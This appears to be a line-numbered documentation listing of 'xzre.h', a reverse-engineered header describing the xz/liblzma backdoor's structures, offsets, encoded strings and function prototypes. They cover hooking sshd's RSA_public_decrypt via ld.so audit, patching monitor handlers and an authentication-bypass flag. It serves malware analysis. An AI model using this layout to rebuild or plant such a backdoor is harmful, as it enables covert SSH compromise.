16 #include <sys/select.h>
24 typedef uintptr_t uptr;
27 typedef unsigned int pid_t;
28 typedef unsigned int uid_t;
29 typedef unsigned int gid_t;
30 typedef unsigned int mode_t;
32 typedef uint16_t Elf64_Half;
33 typedef uint32_t Elf64_Word;
34 typedef int32_t Elf64_Sword;
35 typedef uint64_t Elf64_Xword;
36 typedef int64_t Elf64_Sxword;
37 typedef uint32_t Elf32_Addr;
38 typedef uint64_t Elf64_Addr;
39 typedef uint64_t Elf64_Off;
40 typedef uint16_t Elf64_Section;
42 typedef Elf64_Xword Elf64_Relr;
44 #define EI_NIDENT (16)
47 unsigned char e_ident[EI_NIDENT];
56 Elf64_Half e_phentsize;
58 Elf64_Half e_shentsize;
60 Elf64_Half e_shstrndx;
89 unsigned char st_info;
90 unsigned char st_other;
91 Elf64_Section st_shndx;
100 Elf64_Sxword r_addend;
104 Elf32_Sym, Elf64_Relr,
105 Elf64_Verdef, Elf64_Versym, sigset_t, fd_set, EVP_PKEY, RSA, DSA,
106 BIGNUM, EC_POINT, EC_KEY, EC_GROUP, EVP_MD, point_conversion_form_t,
107 EVP_CIPHER, EVP_CIPHER_CTX, ENGINE, EVP_MD_CTX, EVP_PKEY_CTX, BN_CTX;
109 void *(*alloc)(
void *opaque,
size_t nmemb,
size_t size);
110 void (*free)(
void *opaque,
void *ptr);
114 typedef long int Lmid_t;
115 #define ElfW(Sym) Elf64_Sym
133 LZMA_CHECK_CRC32 = 1,
140 LZMA_CHECK_CRC64 = 4,
147 LZMA_CHECK_SHA256 = 10
159 #include <openssl/dsa.h>
160 #include <openssl/ec.h>
161 #include <openssl/evp.h>
162 #include <openssl/rsa.h>
165 typedef Elf64_Xword Elf64_Relr;
168 #define UPTR(x) ((uptr)(x))
169 #define PTRADD(a, b) (UPTR(a) + UPTR(b))
170 #define PTRDIFF(a, b) (UPTR(a) - UPTR(b))
178 #define BUILD_BUG_ON_ZERO(e) ((int)(sizeof(struct { int:(-!!(e)); })))
179 #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
180 #define __must_be_array(a) BUILD_BUG_ON_ZERO(__same_type((a), &(a)[0]))
181 #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) + __must_be_array(arr))
187 unsigned int bindflags;
190 typedef struct link_map *lookup_t;
197 uint32_t bloom_shift;
207 struct La_i86_retval;
208 struct La_x86_64_regs;
209 struct La_x86_64_retval;
211 struct La_x32_retval;
217 void (*activity) (uintptr_t *,
unsigned int);
218 char *(*objsearch) (
const char *, uintptr_t *,
unsigned int);
219 unsigned int (*objopen) (
struct link_map *, Lmid_t, uintptr_t *);
220 void (*preinit) (uintptr_t *);
223 uintptr_t (*symbind32) (Elf32_Sym *,
unsigned int, uintptr_t *,
224 uintptr_t *,
unsigned int *,
const char *);
225 uintptr_t (*symbind64) (Elf64_Sym *,
unsigned int, uintptr_t *,
226 uintptr_t *,
unsigned int *,
const char *);
230 Elf32_Addr (*i86_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
231 uintptr_t *,
struct La_i86_regs *,
232 unsigned int *,
const char *name,
233 long int *framesizep);
234 Elf64_Addr (*x86_64_gnu_pltenter) (Elf64_Sym *,
unsigned int,
236 uintptr_t *,
struct La_x86_64_regs *,
237 unsigned int *,
const char *name,
238 long int *framesizep);
239 Elf32_Addr (*x32_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
240 uintptr_t *,
struct La_x32_regs *,
241 unsigned int *,
const char *name,
242 long int *framesizep);
246 unsigned int (*i86_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
247 uintptr_t *,
const struct La_i86_regs *,
248 struct La_i86_retval *,
const char *);
249 unsigned int (*x86_64_gnu_pltexit) (Elf64_Sym *,
unsigned int,
252 const struct La_x86_64_regs *,
253 struct La_x86_64_retval *,
255 unsigned int (*x32_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
257 const struct La_x32_regs *,
258 struct La_x86_64_retval *,
261 unsigned int (*objclose) (uintptr_t *);
293 #define CHACHA20_KEY_SIZE 32
294 #define CHACHA20_IV_SIZE 16
295 #define SHA256_DIGEST_SIZE 32
296 #define ED448_KEY_SIZE 57
297 #define ED448_SIGNATURE_SIZE 114
299 #define X_BN_num_bytes(bits) (((bits)+7)/8)
302 #define XZDASM_OPC(op) ((u8)(op) - 0x80)
305 X86_OPCODE_LEA = 0x8D,
306 X86_OPCODE_CALL = 0xE8,
308 X86_OPCODE_CMP = 0x3B,
310 X86_OPCODE_MOV = 0x89,
312 X86_OPCODE_MOV_LOAD = 0x8B,
315 X86_OPCODE_MOV_STORE = 0x8C
318 #define XZDASM_TEST_MASK(mask, offset, opcode) \
319 (((mask >> ((u8)(XZDASM_OPC(opcode) + offset))) & 1) == 1)
355 DF2_MEM_SEG_OFFS = 0x4,
358 DF2_FLAGS_MEM = DF2_MEM_DISP | DF2_MEM_DISP8 | DF2_MEM_SEG_OFFS,
406 X_ELF_DYNAMIC_LINKER = 1,
412 XREF_xcalloc_zero_size = 0,
413 XREF_Could_not_chdir_to_home_directory_s_s = 1,
414 XREF_list_hostkey_types = 2,
415 XREF_demote_sensitive_data = 3,
416 XREF_mm_terminate = 4,
417 XREF_mm_pty_allocate = 5,
418 XREF_mm_do_pam_account = 6,
419 XREF_mm_session_pty_cleanup2 = 7,
420 XREF_mm_getpwnamallow = 8,
421 XREF_mm_sshpam_init_ctx = 9,
422 XREF_mm_sshpam_query = 10,
423 XREF_mm_sshpam_respond = 11,
424 XREF_mm_sshpam_free_ctx = 12,
425 XREF_mm_choose_dh = 13,
426 XREF_sshpam_respond = 14,
427 XREF_sshpam_auth_passwd = 15,
428 XREF_sshpam_query = 16,
430 XREF_mm_request_send = 18,
431 XREF_mm_log_handler = 19,
432 XREF_Could_not_get_agent_socket = 20,
433 XREF_auth_root_allowed = 21,
434 XREF_mm_answer_authpassword = 22,
435 XREF_mm_answer_keyallowed = 23,
436 XREF_mm_answer_keyverify = 24,
437 XREF_48s_48s_d_pid_ld_ = 25,
438 XREF_Unrecognized_internal_syslog_level_code_d = 26
444 STR_48s_48s_d_pid_ld_ = 0xd8,
446 STR_usr_sbin_sshd = 0x108,
447 STR_Accepted_password_for = 0x870,
448 STR_Accepted_publickey_for = 0x1a0,
449 STR_BN_bin2bn = 0xc40,
450 STR_BN_bn2bin = 0x6d0,
453 STR_BN_num_bits = 0x4e0,
454 STR_Connection_closed_by = 0x790,
455 STR_Could_not_chdir_to_home_directory_s_s = 0x18,
456 STR_Could_not_get_agent_socket = 0xb0,
458 STR_DSA_get0_pqg = 0x9d0,
459 STR_DSA_get0_pub_key = 0x468,
460 STR_EC_KEY_get0_group = 0x7e8,
461 STR_EC_KEY_get0_public_key = 0x268,
462 STR_EC_POINT_point2oct = 0x6e0,
463 STR_EVP_CIPHER_CTX_free = 0xb28,
464 STR_EVP_CIPHER_CTX_new = 0x838,
465 STR_EVP_DecryptFinal_ex = 0x2a8,
466 STR_EVP_DecryptInit_ex = 0xc08,
467 STR_EVP_DecryptUpdate = 0x3f0,
468 STR_EVP_Digest = 0xf8,
469 STR_EVP_DigestVerify = 0x408,
470 STR_EVP_DigestVerifyInit = 0x118,
471 STR_EVP_MD_CTX_free = 0xd10,
472 STR_EVP_MD_CTX_new = 0xaf8,
473 STR_EVP_PKEY_free = 0x6f8,
474 STR_EVP_PKEY_new_raw_public_key = 0x758,
475 STR_EVP_PKEY_set1_RSA = 0x510,
476 STR_EVP_chacha20 = 0xc28,
477 STR_EVP_sha256 = 0xc60,
479 STR_GLIBC_2_2_5 = 0x8c0,
480 STR_GLRO_dl_naudit_naudit = 0x6a8,
481 STR_KRB5CCNAME = 0x1e0,
482 STR_LD_AUDIT = 0xcf0,
483 STR_LD_BIND_NOT = 0xbc0,
484 STR_LD_DEBUG = 0xa90,
485 STR_LD_PROFILE = 0xb98,
486 STR_LD_USE_LOAD_BIAS = 0x3e0,
488 STR_RSA_free = 0xac0,
489 STR_RSA_get0_key = 0x798,
491 STR_RSA_public_decrypt = 0x1d0,
492 STR_RSA_set0_key = 0x540,
493 STR_RSA_sign = 0x8f8,
496 STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
497 STR_WAYLAND_DISPLAY = 0x158,
498 STR_errno_location = 0x878,
499 STR_libc_stack_end = 0x2b0,
500 STR_libc_start_main = 0x228,
501 STR_dl_audit_preinit = 0xa60,
502 STR_dl_audit_symbind_alt = 0x9c8,
505 STR_rtld_global = 0x5b8,
506 STR_rtld_global_ro = 0xa98,
507 STR_auth_root_allowed = 0xb8,
508 STR_authenticating = 0x1d8,
509 STR_demote_sensitive_data = 0x28,
511 STR_ld_linux_x86_64_so = 0xa48,
513 STR_libcrypto_so = 0x7c0,
514 STR_liblzma_so = 0x590,
515 STR_libsystemd_so = 0x938,
516 STR_list_hostkey_types = 0x20,
517 STR_malloc_usable_size = 0x440,
518 STR_mm_answer_authpassword = 0xc0,
519 STR_mm_answer_keyallowed = 0xc8,
520 STR_mm_answer_keyverify = 0xd0,
521 STR_mm_answer_pam_start = 0x948,
522 STR_mm_choose_dh = 0x78,
523 STR_mm_do_pam_account = 0x40,
524 STR_mm_getpwnamallow = 0x50,
525 STR_mm_log_handler = 0xa8,
526 STR_mm_pty_allocate = 0x38,
527 STR_mm_request_send = 0xa0,
528 STR_mm_session_pty_cleanup2 = 0x48,
529 STR_mm_sshpam_free_ctx = 0x70,
530 STR_mm_sshpam_init_ctx = 0x58,
531 STR_mm_sshpam_query = 0x60,
532 STR_mm_sshpam_respond = 0x68,
533 STR_mm_terminate = 0x30,
534 STR_parse_PAM = 0xc58,
535 STR_password = 0x400,
538 STR_publickey = 0x7b8,
540 STR_rsa_sha2_256 = 0x710,
541 STR_setlogmask = 0x428,
542 STR_setresgid = 0x5f0,
543 STR_setresuid = 0xab8,
544 STR_shutdown = 0x760,
546 STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
547 STR_sshpam_auth_passwd = 0x88,
548 STR_sshpam_query = 0x90,
549 STR_sshpam_respond = 0x80,
550 STR_start_pam = 0x98,
555 STR_xcalloc_zero_size = 0x10,
556 STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
561 PAYLOAD_STATE_INITIAL = -1
565 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
567 #define assert_offset(t, f, o)
570 #define CONCAT(x, y) x ## y
571 #define EXPAND(x, y) CONCAT(x, y)
572 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
585 static_assert(
sizeof(
struct sshbuf) == 64);
590 #define PERMIT_NOT_SET -1
592 #define PERMIT_FORCED_ONLY 1
593 #define PERMIT_NO_PASSWD 2
612 struct sshkey **host_keys;
613 struct sshkey **host_pubkeys;
614 struct sshkey **host_certificates;
644 struct sshbuf *sk_key_handle;
645 struct sshbuf *sk_reserved;
647 struct sshkey_cert *cert;
649 u8 *shielded_private;
652 size_t shield_prekey_len;
655 typedef struct __attribute__((packed))
got_ctx {
679 assert_offset(
got_ctx_t, return_address, 0x8);
680 assert_offset(
got_ctx_t, cpuid_fn, 0x10);
681 assert_offset(
got_ctx_t, got_offset, 0x18);
682 static_assert(
sizeof(
got_ctx_t) == 0x20);
704 #define X86_MODRM_BYTE(mod, reg, rm) \
706 | (u8)(((mod) & 3) << 6) \
707 | (u8)(((reg) & 7) << 3) \
711 #define X86_REX_BYTE(w,r,x,b) \
713 | (u8)(((w) & 1) << 3) \
714 | (u8)(((r) & 1) << 2) \
715 | (u8)(((x) & 1) << 1) \
716 | (u8)(((b) & 1) << 0) \
719 #define X86_REX_W X86_REX_BYTE(1,0,0,0)
724 #define XZDASM_MODRM_MAKE(mod, reg, rm) \
726 | (u32)(((rm) & 0xFF)<< 24) \
727 | (u32)(((reg) & 0xFF) << 16) \
728 | (u32)(((mod) & 0xFF) << 8) \
729 | X86_MODRM_BYTE(mod, reg, rm) \
732 enum dasm_modrm_mask {
733 XZ_MODRM_RM = 0xFF000000,
734 XZ_MODRM_REG = 0x00FF0000,
735 XZ_MODRM_MOD = 0x0000FF00,
736 XZ_MODRM_RAW = 0x000000FF
741 u64 instruction_size;
743 struct __attribute__((packed)) {
761 struct __attribute__((packed)) {
772 struct __attribute__((packed)) {
784 struct __attribute__((packed)) {
786 struct __attribute__((packed)) {
801 u64 operand_zeroextended;
808 assert_offset(
dasm_ctx_t, instruction_size, 8);
811 assert_offset(
dasm_ctx_t, lock_rep_byte, 0x14);
831 assert_offset(
dasm_ctx_t, operand_zeroextended, 0x40);
832 assert_offset(
dasm_ctx_t, operand_size, 0x48);
899 Elf64_Versym *versym;
900 Elf64_Rela *rela_relocs;
903 Elf64_Relr *relr_relocs;
917 u64 rodata_segment_start;
918 u64 rodata_segment_size;
919 u64 data_segment_start;
920 u64 data_segment_size;
921 u64 data_segment_alignment;
933 u32 gnu_hash_bloom_shift;
936 u32 *gnu_hash_buckets;
945 assert_offset(
elf_info_t, dyn_num_entries, 0x28);
949 assert_offset(
elf_info_t, plt_relocs_num, 0x48);
950 assert_offset(
elf_info_t, gnurelro_found, 0x4C);
951 assert_offset(
elf_info_t, gnurelro_vaddr, 0x50);
952 assert_offset(
elf_info_t, gnurelro_memsize, 0x58);
957 assert_offset(
elf_info_t, rela_relocs_num, 0x80);
959 assert_offset(
elf_info_t, relr_relocs_num, 0x90);
960 assert_offset(
elf_info_t, code_segment_start, 0x98);
961 assert_offset(
elf_info_t, code_segment_size, 0xA0);
962 assert_offset(
elf_info_t, rodata_segment_start, 0xA8);
963 assert_offset(
elf_info_t, rodata_segment_size, 0xB0);
964 assert_offset(
elf_info_t, data_segment_start, 0xB8);
965 assert_offset(
elf_info_t, data_segment_size, 0xC0);
966 assert_offset(
elf_info_t, data_segment_alignment, 0xC8);
968 assert_offset(
elf_info_t, gnu_hash_nbuckets, 0xd8);
969 assert_offset(
elf_info_t, gnu_hash_last_bloom, 0xdc);
970 assert_offset(
elf_info_t, gnu_hash_bloom_shift, 0xe0);
971 assert_offset(
elf_info_t, gnu_hash_bloom, 0xe8);
972 assert_offset(
elf_info_t, gnu_hash_buckets, 0xf0);
973 assert_offset(
elf_info_t, gnu_hash_chain, 0xf8);
977 u32 resolved_imports_count;
979 size_t (*malloc_usable_size)(
void *ptr);
980 uid_t (*getuid)(void);
981 void (*exit)(
int status);
982 int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
983 int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
984 int (*system)(
const char *command);
985 ssize_t (*write)(
int fd,
const void *buf,
size_t count);
987 int nfds, fd_set *readfds, fd_set *writefds,
988 fd_set *exceptfds,
const struct timespec *timeout,
989 const sigset_t *sigmask);
990 ssize_t (*read)(
int fd,
void *buf,
size_t count);
991 int *(*__errno_location)(void);
992 int (*setlogmask)(
int mask);
993 int (*shutdown)(
int sockfd,
int how);
994 void *__libc_stack_end;
1013 typedef int (*pfn_RSA_public_decrypt_t)(
1014 int flen,
unsigned char *from,
unsigned char *to,
1015 RSA *rsa,
int padding);
1016 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey,
struct rsa_st *key);
1017 typedef void (*pfn_RSA_get0_key_t)(
1019 const BIGNUM **n,
const BIGNUM **e,
const BIGNUM **d);
1023 pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
1025 void (*RSA_get0_key_null)(
1026 const RSA *r,
const BIGNUM **n,
1027 const BIGNUM **e,
const BIGNUM **d);
1032 pfn_RSA_public_decrypt_t *RSA_public_decrypt_plt;
1037 pfn_EVP_PKEY_set1_RSA_t *EVP_PKEY_set1_RSA_plt;
1042 pfn_RSA_get0_key_t *RSA_get0_key_plt;
1043 void (*DSA_get0_pqg)(
1044 const DSA *d,
const BIGNUM **p,
1045 const BIGNUM **q,
const BIGNUM **g);
1046 const BIGNUM *(*DSA_get0_pub_key)(
const DSA *d);
1047 size_t (*EC_POINT_point2oct)(
1048 const EC_GROUP *group,
const EC_POINT *p,
1049 point_conversion_form_t form,
unsigned char *buf,
1050 size_t len, BN_CTX *ctx);
1051 EC_POINT *(*EC_KEY_get0_public_key)(
const EC_KEY *key);
1052 const EC_GROUP *(*EC_KEY_get0_group)(
const EC_KEY *key);
1053 EVP_MD *(*EVP_sha256)(void);
1054 pfn_RSA_get0_key_t RSA_get0_key;
1055 int (*BN_num_bits)(
const BIGNUM *a);
1056 EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
1057 int type, ENGINE *e,
1058 const unsigned char *key,
size_t keylen);
1059 EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
1060 int (*EVP_DigestVerifyInit)(
1061 EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
1062 const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
1063 int (*EVP_DigestVerify)(
1064 EVP_MD_CTX *ctx,
const unsigned char *sig,
1065 size_t siglen,
const unsigned char *tbs,
size_t tbslen);
1066 void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
1067 void (*EVP_PKEY_free)(EVP_PKEY *key);
1068 EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
1069 int (*EVP_DecryptInit_ex)(
1070 EVP_CIPHER_CTX *ctx,
const EVP_CIPHER *type,
1071 ENGINE *impl,
const unsigned char *key,
const unsigned char *iv);
1072 int (*EVP_DecryptUpdate)(
1073 EVP_CIPHER_CTX *ctx,
unsigned char *out,
1074 int *outl,
const unsigned char *in,
int inl);
1075 int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx,
unsigned char *outm,
int *outl);
1076 void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
1077 const EVP_CIPHER *(*EVP_chacha20)(void);
1078 RSA *(*RSA_new)(void);
1079 BIGNUM *(*BN_dup)(
const BIGNUM *from);
1080 BIGNUM *(*BN_bin2bn)(
const unsigned char *s,
int len, BIGNUM *ret);
1081 int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
1083 const void *data,
size_t count,
unsigned char *md,
1084 unsigned int *size,
const EVP_MD *type, ENGINE *impl);
1087 const unsigned char *m,
unsigned int m_len,
1088 unsigned char *sigret,
unsigned int *siglen, RSA *rsa);
1089 int (*BN_bn2bin)(
const BIGNUM *a,
unsigned char *to);
1090 void (*RSA_free)(RSA *rsa);
1091 void (*BN_free)(BIGNUM *a);
1093 u32 resolved_imports_count;
1139 typedef int (*sshd_monitor_func_t)(
struct ssh *ssh,
int sock,
struct sshbuf *m);
1142 BOOL have_mm_answer_keyallowed;
1143 BOOL have_mm_answer_authpassword;
1144 BOOL have_mm_answer_keyverify;
1147 void *mm_answer_keyallowed;
1148 void *mm_answer_keyverify;
1149 void *mm_answer_authpassword_start;
1150 void *mm_answer_authpassword_end;
1151 sshd_monitor_func_t *mm_answer_authpassword_ptr;
1152 int monitor_reqtype_authpassword;
1154 sshd_monitor_func_t *mm_answer_keyallowed_start;
1155 void *mm_answer_keyallowed_end;
1156 void *mm_answer_keyallowed_ptr;
1157 u32 mm_answer_keyallowed_reqtype;
1159 void *mm_answer_keyverify_start;
1160 void *mm_answer_keyverify_end;
1161 void *mm_answer_keyverify_ptr;
1168 char *STR_unknown_ptr;
1169 void *mm_request_send_start;
1170 void *mm_request_send_end;
1171 PADDING(
sizeof(u32));
1172 PADDING(
sizeof(u32));
1174 int *permit_root_login_ptr;
1175 char *STR_without_password;
1176 char *STR_publickey;
1179 assert_offset(
sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
1180 assert_offset(
sshd_ctx_t, have_mm_answer_authpassword, 0x4);
1181 assert_offset(
sshd_ctx_t, have_mm_answer_keyverify, 0x8);
1183 assert_offset(
sshd_ctx_t, mm_answer_keyallowed, 0x18);
1184 assert_offset(
sshd_ctx_t, mm_answer_keyverify, 0x20);
1185 assert_offset(
sshd_ctx_t, mm_answer_authpassword_start, 0x28);
1186 assert_offset(
sshd_ctx_t, mm_answer_authpassword_end, 0x30);
1187 assert_offset(
sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
1188 assert_offset(
sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
1189 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
1190 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
1191 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
1192 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_reqtype, 0x60);
1193 assert_offset(
sshd_ctx_t, mm_answer_keyverify_start, 0x68);
1194 assert_offset(
sshd_ctx_t, mm_answer_keyverify_end, 0x70);
1195 assert_offset(
sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
1196 assert_offset(
sshd_ctx_t, writebuf_size, 0x84);
1198 assert_offset(
sshd_ctx_t, STR_unknown_ptr, 0xA0);
1199 assert_offset(
sshd_ctx_t, mm_request_send_start, 0xA8);
1200 assert_offset(
sshd_ctx_t, mm_request_send_end, 0xB0);
1201 assert_offset(
sshd_ctx_t, use_pam_ptr, 0xC0);
1202 assert_offset(
sshd_ctx_t, permit_root_login_ptr, 0xC8);
1203 assert_offset(
sshd_ctx_t, STR_without_password, 0xD0);
1204 assert_offset(
sshd_ctx_t, STR_publickey, 0xD8);
1211 SYSLOG_LEVEL_VERBOSE,
1212 SYSLOG_LEVEL_DEBUG1,
1213 SYSLOG_LEVEL_DEBUG2,
1214 SYSLOG_LEVEL_DEBUG3,
1215 SYSLOG_LEVEL_NOT_SET = -1
1218 typedef void (*log_handler_fn)(
1225 BOOL logging_disabled;
1226 BOOL log_hooking_possible;
1227 BOOL syslog_disabled;
1229 char *STR_percent_s;
1230 char *STR_Connection_closed_by;
1232 char *STR_authenticating;
1236 void *log_handler_ptr;
1237 void *log_handler_ctx_ptr;
1238 log_handler_fn orig_log_handler;
1239 void *orig_log_handler_ctx;
1241 void (*mm_log_handler)(
int level,
int forced,
const char *msg,
void *ctx);
1262 struct __attribute__((packed)) {
1270 struct __attribute__((packed)) {
1271 u8 sshbuf_data_qword_index;
1272 u8 sshbuf_size_qword_index;
1330 struct monitor **struct_monitor_ptr_address;
1367 u64 sock_read_buf_size;
1368 u8 sock_read_buf[64];
1369 u64 payload_data_size;
1378 u32 sshd_host_pubkey_idx;
1383 u8 secret_data[ED448_KEY_SIZE];
1389 u8 shift_operations[31];
1434 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1537 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
1553 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1558 pfn_RSA_get0_key_t hook_RSA_get0_key;
1560 u64 hooks_installed;
1563 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
1564 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
1565 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
1566 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
1567 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
1568 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
1569 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
1570 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
1571 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
1573 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
1574 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
1575 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
1577 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
1578 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
1580 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
1591 u64 signed_data_size;
1609 uintptr_t (*symbind64)(
1610 Elf64_Sym *sym,
unsigned int ndx,
1611 uptr *refcook, uptr *defcook,
1612 unsigned int flags,
const char *symname);
1614 pfn_RSA_get0_key_t hook_RSA_get0_key;
1615 log_handler_fn mm_log_handler;
1616 PADDING(
sizeof(
void *));
1617 PADDING(
sizeof(
void *));
1618 sshd_monitor_func_t mm_answer_keyallowed;
1619 sshd_monitor_func_t mm_answer_keyverify;
1620 PADDING(
sizeof(
void *));
1676 Elf64_Ehdr *dynamic_linker_ehdr;
1677 void **__libc_stack_end;
1681 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
1682 assert_offset(
main_elf_t, __libc_stack_end, 0x10);
1746 struct link_map *liblzma_map;
1747 struct link_map *libcrypto_map;
1748 struct link_map *libsystemd_map;
1749 struct link_map *libc_map;
1786 lzma_allocator fake_allocator;
1862 u32 operation_index;
1882 struct __attribute__((packed)) {
1891 typedef union __attribute__((packed)) {
1905 u8 signature[ED448_SIGNATURE_SIZE];
1920 struct __attribute__((packed)) {
1933 struct __attribute__((packed)) {
1944 #define TEST_FLAG(x, flag) (((x) & (flag)) != 0)
1983 X_FLAGS2_AUTH_BYPASS = 0x4,
2021 const BIGNUM *rsa_n;
2022 const BIGNUM *rsa_e;
2025 PADDING(CHACHA20_KEY_SIZE + CHACHA20_IV_SIZE);
2026 u8 ivec[CHACHA20_IV_SIZE];
2027 u8 ed448_key[ED448_KEY_SIZE];
2034 assert_offset(
key_ctx_t, payload, 0x15);
2036 assert_offset(
key_ctx_t, ed448_key, 0x27D);
2046 const BIGNUM *rsa_n;
2047 const BIGNUM *rsa_e;
2049 u16 payload_body_size;
2068 struct timespec timespec;
2083 u64 hostkey_hash_offset;
2085 u8 *payload_data_ptr;
2094 struct __attribute__((packed)) {
2099 struct __attribute__((packed)) {
2101 u64 num_host_pubkeys;
2102 u8 ed448_key[ED448_KEY_SIZE];
2173 PADDING(
sizeof(u64));
2180 PADDING(
sizeof(u64));
2181 PADDING(
sizeof(u64));
2188 PADDING(
sizeof(u64));
2203 PADDING(
sizeof(u64));
2204 lzma_allocator allocator;
2234 u8 *output_register;
2367 BOOL is_64bit_operand,
2390 BOOL is_64bit_operand,
2456 EncodedStringId encoded_string_id,
2510 FuncFindType find_mode);
2569 extern char *check_argument(
char arg_first_char,
char* arg_name);
2682 EncodedStringId encoded_string_id);
2716 StringXrefId xref_id,
2717 void **pOutCodeStart,
void **pOutCodeEnd,
2736 EncodedStringId *stringId_inOut,
2737 void *rodata_start_ptr);
2807 unsigned shift_count, BOOL start_from_call);
2821 unsigned operation_index,
2822 unsigned shift_count,
2823 int index, u8 *code);
2851 unsigned shift_count,
unsigned operation_index);
2896 u8 *call_site, u8 *code,
2898 unsigned shift_count,
unsigned operation_index);
2913 unsigned shift_count,
unsigned operation_index,
3030 struct link_map *libc,
3107 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
3148 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
3161 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
3249 uptr *refcook, uptr *defcook,
3251 const char *symname);
3282 ptrdiff_t *libname_offset,
3310 ptrdiff_t *libname_offset,
3357 ptrdiff_t libname_offset,
3400 void **sensitive_data_out);
3421 void **sensitive_data_out,
3491 u8 *buffer, u64 bufferSize,
3572 u64 sshkey_digest_offset,
3573 u64 signed_data_size,
3591 BOOL skip_root_patch,
3593 BOOL replace_monitor_reqtype,
3594 int monitor_reqtype,
3622 u8 **code_start_out,
3660 void **monitor_field_ptr_out,
3678 void *mem_range_start,
3746 enum SocketMode socket_direction
3792 struct sshbuf *sshbuf_data,
3794 size_t *out_payload_size,
3807 size_t payload_size,
3902 unsigned int num_pointers
3931 int flen,
unsigned char *from,
3932 unsigned char *to, RSA *rsa,
int padding);
3944 LogLevel level,
const char *fmt, ...);
4010 static_assert(
sizeof(global_ctx) ==
sizeof(
void *));
4013 static_assert(
sizeof(hooks_data) ==
sizeof(
void *));
int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
Definition: ssh_patch.c:37
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:2145
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:2133
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:2139
data passed to functions that access the backdoor data
Definition: xzre.h:1690
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1735
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1780
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1785
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1740
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1770
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1775
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1766
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1760
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1790
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1745
the contents of the RSA 'n' field
Definition: xzre.h:1917
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1824
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
